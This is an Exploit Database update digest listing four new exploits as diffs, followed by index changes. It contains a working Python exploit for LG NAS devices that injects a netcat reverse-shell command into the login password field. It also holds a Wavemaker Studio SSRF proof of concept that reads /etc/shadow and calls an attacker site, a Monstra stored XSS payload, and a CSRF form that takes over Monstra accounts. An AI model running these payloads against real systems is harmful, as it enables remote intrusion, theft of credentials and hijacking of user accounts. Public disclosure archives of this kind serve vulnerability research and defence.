DB: 2018-08-13

4 changes to exploits/shellcodes

LG NAS 3718.510.a0 - Remote Command Execution
Monstra 3.0.4 - Cross-Site Scripting
Wavemaker Studio 6.6 - Server-Side Request Forgery
Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)

exploits/hardware/webapps/45109.py

@@ -0,0 +1,52 @@
+# LG NAS 3718.510.a0 - Remote Command Execution
+# Author: @0x616163
+# Date: 2018-07-29
+# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+# CVE: N/A
+# Firmware Version: 3718.510.a0
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+import requests
+from collections import OrderedDict
+
+def checkUser(target):
+	# Exploiting this vulnerability requires a valid user account
+	# on the target NAS otherwise the vulnerable code is not executed
+	parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
+	r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
+	if r.text == "NG:WRONG PASSWORD\n":
+		print "[*] Valid user found: admin"
+		return 0
+	elif r.text == "NG:NO USER\n":
+		print "[*] User not found: admin"
+		sys.exit(1)
+
+def sendPayload(target,lhost,lport):
+	print "[*] Sending payload.."
+	try:
+		parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
+		r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
+	except requests.exceptions.ReadTimeout:
+		print "[*] Payload sent. Exiting."
+		sys.exit(0)
+
+	return 0
+def main():
+	parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
+	parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
+	parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
+	parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
+	results = parser.parse_args()
+	args = vars(results)
+	if len(sys.argv) < 1:
+		parser.print_help()
+		sys.exit(1)
+	else:
+		if checkUser(args['target']) == 0:
+			sendPayload(args['target'], args['lhost'],args['lport'])
+
+main()
+sys.exit(0)

exploits/java/webapps/45158.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
+# Exploit Author: Gionathan "John" Reale
+# Google Dork: N/A
+# Date: 2018-08-01
+# Vendor Homepage: http://www.wavemaker.com/
+# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
+# Affected Version: 6.6
+# Tested on: Parrot OS
+# CVE : N/A
+ 
+# Description
+# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an 
+# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
+# can also be exploited to access sensitive data or to use the server hosting Wavemaker
+# as a form of HTTP proxy among other things.
+ 
+# Proof Of Concept
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
+
+# Vulnerable Code
+# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
+
+# Line 419-430
+@ExposeToClient
+public String getContent(String inUrl) throws IOException {
+	try {
+			String str = getRemoteContent(inUrl);
+            str = str.replace("<head>", "<head><base href='" + inUrl
+                + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
+            return str;
+        } catch (Exception e) {
+            return "";
+        }
+}

exploits/php/webapps/45156.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# POC
+1- Go  to the  site ( http://server.com/monstra-dev/ ) .
+2- Click on  Registration page  (Registration) .
+3- Register by giving you name ,mail and soo on...
+4- Now log In i the website.
+5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Case/)>  and in Lastname paste  "><svg/onload=alert(/Test/)> 
+6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".

exploits/php/webapps/45164.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# 1. Description
+# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker
+# to take over a user account by modifying user's data such as email and password
+ 
+# 2. Exploit and Proof of Concept
+# To exploit this vulnerability, victim need to be logged in at target site namely
+# victim.com and visit crafted site made by attacker namely attacker.com. 
+# Then an authenticated POST request will be generated from victim browser and it will
+# be submit to victim.com to modify user's data to attacker desired value.
+
+#POC:CSRF
+
+<html>
+  <!-- CSRF PoC -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/monstra-dev/users/2/edit" method="POST">
+      <input type="hidden" name="csrf" value="7e172c2a395495f3e4c05912cb9f3f7f0ed8344e" />
+      <input type="hidden" name="user&#95;id" value="2" />
+      <input type="hidden" name="login" value="guptanainisi95" />
+      <input type="hidden" name="firstname" value="sd" />
+      <input type="hidden" name="lastname" value="jkh" />
+      <input type="hidden" name="email" value="guptanainsi97&#64;gmail&#46;com" />
+      <input type="hidden" name="twitter" value="" />
+      <input type="hidden" name="skype" value="" />
+      <input type="hidden" name="about&#95;me" value="ss" />
+      <input type="hidden" name="new&#95;password" value="qaz" />
+      <input type="hidden" name="edit&#95;profile" value="Save" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

files_exploits.csv

@@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port
 45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
 45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
 45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
+45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware,
 45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
 45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
@@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
+45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
+45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
 45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
 45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,